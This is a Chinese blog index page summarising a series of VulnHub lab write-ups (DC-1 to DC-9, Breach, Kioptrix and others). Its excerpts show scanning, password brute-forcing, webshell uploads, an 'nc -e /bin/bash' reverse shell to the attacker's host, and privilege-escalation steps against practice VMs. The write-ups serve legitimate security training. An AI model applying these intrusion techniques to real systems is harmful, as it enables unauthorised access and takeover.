靶机笔记
文章平均质量分 85
完成过的各类靶机实验过程笔记
不要温顺地走进那个良夜
这个作者很懒,什么都没留下…
展开
-
ACID: SERVER靶机入侵笔记
这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。在tmp目录试了一下,wget、gcc命令不存在,这个靶机应该不能直接用内核提权,应该找一下看能不能找到密码。访问发现是一个邮箱登录页面,先记录下,看后面能不能找到账号密码,再次爆破目录。原创 2023-03-16 15:23:20 · 158 阅读 · 0 评论 -
vulnhub靶机渗透DC-4
密码错误为:499字节大小的包)192.168.80.132 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.132。下载地址:https://www.vulnhub.com/entry/dc-4,313/原创 2023-03-17 11:15:58 · 141 阅读 · 0 评论 -
vulnhub靶机渗透DC-2
根据flag1的提示,我们知道可以通过爬取网站内容来生成字典,爆破后台,这里我们使用wpscan来提取用户名,wpscan是专门最对wordpress的扫描器,命令:wpscan --url dc-2 -e u。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.129。命令:cewl dc-2 -w pds.txt。使用wpscan爆破:wpscan --url dc-2 -U user.txt -P pds.txt。原创 2023-03-17 10:45:20 · 106 阅读 · 0 评论 -
vulnhub靶机渗透DC-5
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/原创 2023-03-17 11:35:04 · 128 阅读 · 0 评论 -
vulnhub靶机渗透DC-7
进入Extend => Install new module,输入php模块包的url:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。那么可能是信息泄露,有时在实际项目中,目标可能使用一些开源项目,我们可以从GITHUB上找到突破口。进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码。下载地址:http://www.vulnhub.com/entry/dc-7,356/原创 2023-03-17 12:02:41 · 51 阅读 · 0 评论 -
vulnhub靶机渗透DC-6
pty.spawn(“/bin/bash”)’一共获得5个用户名,接下来进行爆破:wpscan --url wordy -U user.txt -P passwords.txt。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.135。成功获得flag,但有一个奇怪的问题,nmap获得的rootshell无法显示输入,但确实是成功输入了命令,有回显。下载地址:https://www.vulnhub.com/entry/dc-6,315/原创 2023-03-17 11:46:41 · 95 阅读 · 0 评论 -
vulnhub靶机渗透DC-3
下载exp及其利用工具至靶机:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip (国内同步项目地址:https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip)这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-32,312/原创 2023-03-17 11:01:54 · 69 阅读 · 0 评论 -
vulnhub靶机渗透DC-1
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。原创 2023-03-17 10:25:09 · 240 阅读 · 0 评论 -
vulnhub靶机渗透 FRISTILEAKS: 1.3
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。原创 2023-03-18 17:04:01 · 190 阅读 · 0 评论 -
vulnhub靶机渗透 Lupin-One
下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。原创 2023-03-19 10:34:47 · 156 阅读 · 0 评论 -
vulnhub靶机渗透 Kioptrix1.3
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.135,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.135。经测试登录处password参数存在SQL注入,并且爆出网站绝对路径:/var/www/原创 2023-03-18 17:51:34 · 178 阅读 · 0 评论 -
vulnhub靶机渗透 Breach 1
Tomcat后台get shell是有标准姿势的,使用哥斯拉生成jsp马,将其打成shell.zip压缩包,再将zip压缩包将扩展名改为shell.war,将war包上传部署即可.发现的问题:上传的webshell,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用,主机可能有杀软或者杀web shell工具。将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中。这里连接到虚拟网卡1。原创 2023-03-18 15:50:44 · 134 阅读 · 0 评论 -
vulnhub靶机渗透 theEther
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。获取webshell。之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。原创 2023-03-19 11:25:16 · 205 阅读 · 0 评论 -
vulnhub靶机渗透 matrix-breakout-2-morpheus
写webshell那一段,一开始以为是扫目录把靶机扫崩溃了,后来发现靶机有防火墙。之前一直写不了,可能是这个原因。原创 2023-03-19 10:54:16 · 441 阅读 · 0 评论 -
vulnhub靶机渗透 Tomato
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137。需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录,被记入日志。使用了第一个,失败了。原创 2023-03-19 11:32:03 · 295 阅读 · 0 评论 -
vulnhub靶机渗透 DeRPnStiNK_1
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。原创 2023-03-18 16:42:36 · 232 阅读 · 0 评论 -
vulnhub靶机渗透 Empire Breakout
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。 192.168.80.139 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24。10000和20000均是webmin系统的登录界面,口令爆破、目录探测无果。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.139。原创 2023-03-18 16:16:00 · 149 阅读 · 0 评论 -
vulnhub靶机渗透 sick0s1.1
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。原创 2023-03-19 11:19:20 · 185 阅读 · 0 评论 -
vulnhub靶机渗透DC-8
使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.137。扫描网站目录,发现登录界面:dirsearch -u http://192.168.80.137/ -e* -i 200。利用使用说明执行命令提权,发现./46996.sh -m setuid不行,./46996.sh -m netcat可以。尝试SUID提权:find / -perm -4000 -print 2>/dev/null。发现用户及密码字段,查看字段。原创 2023-03-17 12:13:32 · 94 阅读 · 0 评论 -
vulnhub靶机渗透DC-9
在靶机/opt/devstuff/dist/test目录下面创建一个叫swn的文件(随便命名) 再使用sudo用那个test程序来运行这个文件,随后切换成我们添加的这个用户,输入自己设定的密码就可以成功提权到root用户了,最后进入root目录下查看flag即可。它既然拥有root权限,那现在我们要做的就是构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限。在janitor用户里面找到一些密码,加入到字典中,再次爆破。原创 2023-03-17 12:32:45 · 85 阅读 · 0 评论 -
vulnhub靶机渗透 LazysysAdmin
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。根据内核信息,用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。根据内核信息,用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。原创 2023-03-19 10:07:20 · 154 阅读 · 0 评论 -
vulnhub靶机渗透 Billu_b0x
尝试包含/etc/passwd文件,GET方法无法访问,使用POST成功下载passwd文件。 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。访问发现add.php是一个文件上传页面,无论上传什么文件都提示选择图片上传,哪怕是上传的图片,推测应该是后端没做相应处理,用来干扰的空壳文件。网页登录,进入主页发现有显示用户和添加用户,且添加用户可上传头像,头像图片保存在/uploaded_images/目录。原创 2023-03-18 15:40:18 · 309 阅读 · 0 评论 -
vulnhub靶机渗透 KioptrixVM3
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.133,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。发现phpadmin页面,尝试admin空口令登录成功,但只能看information_schema 数据库,没什么发现。两个账户名和前面读取/etc/passwd下的ssh用户一致,可以尝试解密后登录ssh。原创 2023-03-18 18:14:21 · 603 阅读 · 0 评论 -
LordOfTheRoot_1.0.1靶机入侵
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.138。Linux系统中使用.so后缀的,sqlmap中的这两个文件经过了编码,不能直接使用。这里用的是msf里面的。原创 2023-03-15 10:34:55 · 270 阅读 · 2 评论